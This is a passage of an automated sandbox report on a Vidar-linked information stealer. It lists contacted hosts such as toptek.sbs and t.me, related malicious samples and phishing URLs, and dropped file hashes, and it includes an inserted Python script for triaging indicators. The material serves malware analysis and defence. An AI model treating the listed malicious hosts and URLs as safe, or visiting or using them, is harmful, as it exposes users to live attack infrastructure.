https://drive-autopush.corp.google.com/ | false | high | chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmp
https://www.google.com/search?q=$ | false | high | chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp
https://anglebug.com/7162 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
http://anglebug.com/5906 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
http://anglebug.com/2517 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
http://anglebug.com/4937 | false | high | chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp; chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
https://issuetracker.google.com/166809097 | false | high | chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmp
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
239.255.255.250 | unknown | Reserved | unknown | unknown | false
94.130.188.57 | toptek.sbs | Germany | 24940 | HETZNER-AS (DE) | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAM (RU) | false
142.250.181.132 | www.google.com | United States | 15169 | GOOGLE (US) | false

Private / local IPs
192.168.2.4
127.0.0.1
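Which of the contacted IPs above are worth pivoting on is not something the table settles on its own: every row carries Malicious: false, which only means no reputation hit, 239.255.255.250 is the SSDP multicast address every Windows host talks to, and t.me and www.google.com belong to shared services. The script below is an added example, not part of the Joe Sandbox report or its tooling. It applies the checks a responder makes before promoting an IP to an indicator: discard local, multicast and reserved addresses, treat well-known shared-service ASNs separately, and count how many of the associated samples in the report's Match table (further down the page) carry the same family label as this sample, Vidar. The per-IP associated-sample labels are transcribed from that table; the shared-service ASN list, the thresholds and the verdict strings are the analyst's own assumptions.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumption: ASNs the analyst treats as shared infrastructure. The report does
# not carry such a list; these two numbers come from the ASN column above.
SHARED_SERVICE_ASNS: Dict[int, str] = {15169: "GOOGLE", 62041: "TELEGRAM"}


@dataclass
class Contact:
    """One row of the contacted-IP table plus the report's Match data for it."""
    ip: str
    domain: str
    asn: Optional[int]
    associated: List[str]  # Threat Name column of each associated sample


# Transcribed from the report: IP table rows and, per IP, the Threat Name of
# every associated sample listed in the Match table.
CONTACTS: List[Contact] = [
    Contact("239.255.255.250", "unknown", None, [
        "Unknown", "Unknown", "Unknown", "Unknown",
        "LummaC, DarkComet, LummaC Stealer, Vidar",
        "RHADAMANTHYS", "RHADAMANTHYS", "Vidar", "Stealc, Vidar", "Unknown",
    ]),
    Contact("94.130.188.57", "toptek.sbs", 24940, [
        "LummaC, DarkComet, LummaC Stealer, Vidar",
        "Vidar",
        "LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar",
        "LummaC, Amadey, LummaC Stealer, Stealc, Vidar",
        "LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig",
    ]),
    Contact("149.154.167.99", "t.me", 62041, ["Unknown"] * 4),
    Contact("142.250.181.132", "www.google.com", 15169, []),
]


def family_hits(c: Contact, family: str) -> Tuple[int, int]:
    """Return (associated samples tagged with `family`, total associated samples)."""
    hits = sum(1 for names in c.associated if family.lower() in names.lower())
    return hits, len(c.associated)


def classify(c: Contact, family: str, min_shared: int = 3) -> str:
    """Verdict for one contacted IP, given the family of the sample under analysis."""
    addr = ipaddress.ip_address(c.ip)
    # 239.255.255.250 (SSDP), 192.168.x.x and 127.0.0.1 are never indicators.
    if addr.is_multicast or addr.is_private or addr.is_loopback or addr.is_reserved:
        return "noise: local, multicast or reserved address"
    if c.asn in SHARED_SERVICE_ASNS:
        # Blocking the IP would break the service for everyone; the useful
        # indicator is the URL path or account the sample talks to.
        return (f"shared service ({SHARED_SERVICE_ASNS[c.asn]}): "
                "pivot on the URL or account, not the IP")
    hits, total = family_hits(c, family)
    if total and hits == total and hits >= min_shared:
        return f"infrastructure pivot: {hits}/{total} associated samples are {family}"
    if hits:
        return f"weak pivot: {hits}/{total} associated samples are {family}"
    return "no prior association: candidate C2 only with other evidence"


def triage(contacts: List[Contact], family: str) -> Dict[str, str]:
    """Map each contacted IP to its verdict."""
    return {c.ip: classify(c, family) for c in contacts}


if __name__ == "__main__":
    for ip, verdict in triage(CONTACTS, "Vidar").items():
        print(f"{ip:16} {verdict}")
```

Run against the report's data this leaves one usable network indicator, 94.130.188.57 / toptek.sbs, whose five associated samples are all labelled Vidar. The Telegram and Google addresses are kept out of the block list; for those, the request path or profile the sample fetches is the thing to extract, and the report's own "C2 URLs / IPs found in malware configuration" signature is where to confirm which hosts the sample actually uses for command and control. Note also that the cookbook comments below list the IPs and domains the sandbox whitelisted, so the contacted-IP table is already filtered; t.me appears because Telegram was not on that list.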
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579617
Start date and time: 2024-12-23 06:20:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 9EI7wrGs4K.exe (renamed because the original name is a hash value)
Original Sample Name: 8eb4f92605e35c57a42b0917c221d65c.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@43/36@5/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 80
• Number of non-executed functions: 296
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 217.20.58.100, 142.250.181.99, 172.217.17.78, 64.233.162.84, 142.250.181.142, 172.217.17.67, 52.149.20.212, 184.30.17.174, 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryAttributesFile calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:20:57 | API Interceptor | 1x Sleep call for process 9EI7wrGs4K.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
239.255.255.250 | https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLw | malicious | Unknown |
239.255.255.250 | https://staging.effimate.toyo.ai-powered-services.com/ | malicious | Unknown |
239.255.255.250 | https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=Ne7lLAcjQUaMUQJ9C8JRxUnNOxFiqmxEvtl5lDv69HJUMDcyQThVMFBaMzdYWTM3RDY1SVZJUUVaSC4u | malicious | Unknown |
239.255.255.250 | http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72 | malicious | Unknown |
239.255.255.250 | AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar |
239.255.255.250 | Loader.exe | malicious | RHADAMANTHYS |
239.255.255.250 | medicalanalysispro.exe | malicious | RHADAMANTHYS |
239.255.255.250 | GoldenContinent.exe | malicious | Vidar |
239.255.255.250 | FnTSHWLNWB.exe | malicious | Stealc, Vidar |
239.255.255.250 | NOTIFICATION_OF_DEPENDANTS_1.vbs | malicious | Unknown |
94.130.188.57 | AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar |
94.130.188.57 | GoldenContinent.exe | malicious | Vidar |
94.130.188.57 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
94.130.188.57 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
94.130.188.57 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig |
149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico
149.154.167.99 | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
149.154.167.99 | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/
                                                                                                                                                                                                                                                              http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                              http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/?setln=pl
                                                                                                                                                                                                                                                              http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                              http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • telegram.dog/
                                                                                                                                                                                                                                                              LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                                                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              toptek.sbsAmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              t.meAmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznjGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              TELEGRAMRUtg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              HETZNER-ASDEAmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                              • 213.239.239.164
                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                              • 135.181.58.223
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              https://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvVGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 136.243.5.53
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                              • 95.217.252.201
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                              • 188.40.81.35
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                              • 149.154.167.99
AmsterdamCryptoLTD.exe (Detection: malicious; Threat Name: LummaC, DarkComet, LummaC Stealer, Vidar)
• 94.130.188.57
• 149.154.167.99
installer.msi (Detection: malicious; Threat Name: Unknown)
• 94.130.188.57
• 149.154.167.99
GoldenContinent.exe (Detection: malicious; Threat Name: Vidar)
• 94.130.188.57
• 149.154.167.99
file.exe (Detection: malicious; Threat Name: LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc)
• 94.130.188.57
• 149.154.167.99
file.exe (Detection: malicious; Threat Name: LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar)
• 94.130.188.57
• 149.154.167.99
Match: C:\Users\user\AppData\Local\Temp\245347\Dry.com
Associated Sample Name / URL (Detection; Threat Name):
• Wine.exe (malicious; LummaC)
• Setup.exe (malicious; LummaC)
• GoldenContinent.exe (malicious; Vidar)
• file.exe (malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar)
• Full-Setup.exe (malicious; LummaC)
• Setup.exe (malicious; LummaC)
• Setup.exe (malicious; LummaC Stealer)
• Full-Setup.exe (malicious; LummaC Stealer)
• file.exe (malicious; LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig)
• file.exe (malicious; LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig)

Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 294912
Entropy (8bit): 0.08436842005578409
Encrypted: false
SSDEEP: 192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5: 2CD2840E30F477F23438B7C9D031FC08
SHA1: 03D5410A814B298B068D62ACDF493B2A49370518
SHA-256: 49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512: DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.1358696453229276
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5: 28591AA4E12D1C4FC761BE7C0A468622
SHA1: BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256: 51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512: 5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category: dropped
Size (bytes): 159744
Entropy (8bit): 0.7873599747470391
Encrypted: false
SSDEEP: 96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5: 6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1: 4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256: 0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512: BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
SSDEEP: 12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5: 369B6DD66F1CAD49D0952C40FEB9AD41
SHA1: D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256: 14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512: 771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious: false
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9571
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                                                  MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                                                  SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                                                  SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                                                  SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                                                  Malicious:false
